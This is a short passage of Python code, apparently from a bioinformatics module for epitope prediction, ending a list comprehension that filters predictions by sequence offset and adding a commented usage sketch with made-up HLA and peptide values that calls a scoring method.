offset=p.offset - start_offset,
occurs_in_reference=p.occurs_in_reference)
for p in epitope_predictions
if p.offset >= start_offset and p.offset + p.length <= end_offset
]
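def _example_usage():
    # Hypothetical usage sketch (not part of the original module): every field
    # value below is made up; it only shows how logistic_epitope_score() reads
    # percentile_rank against the default cut-off and falls back to el_score.
    prediction = EpitopePrediction(
        allele="HLA-A*02:01",
        peptide_sequence="SIINFEKLM",
        wt_peptide_sequence="SIINFEKLV",
        length=9,
        ic50=25.0,
        el_score=0.85,
        wt_ic50=5000.0,
        wt_el=50.0,
        percentile_rank=0.5,
        prediction_method_name="example",
        overlaps_mutation=True,
        source_sequence="SIINFEKLM",
        offset=0,
        occurs_in_reference=False)
    # 0.5 < 10.0 (default cut-off), so the mutant EL score is returned.
    return prediction.logistic_epitope_score()  # -> 0.85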
|
StarcoderdataPython
|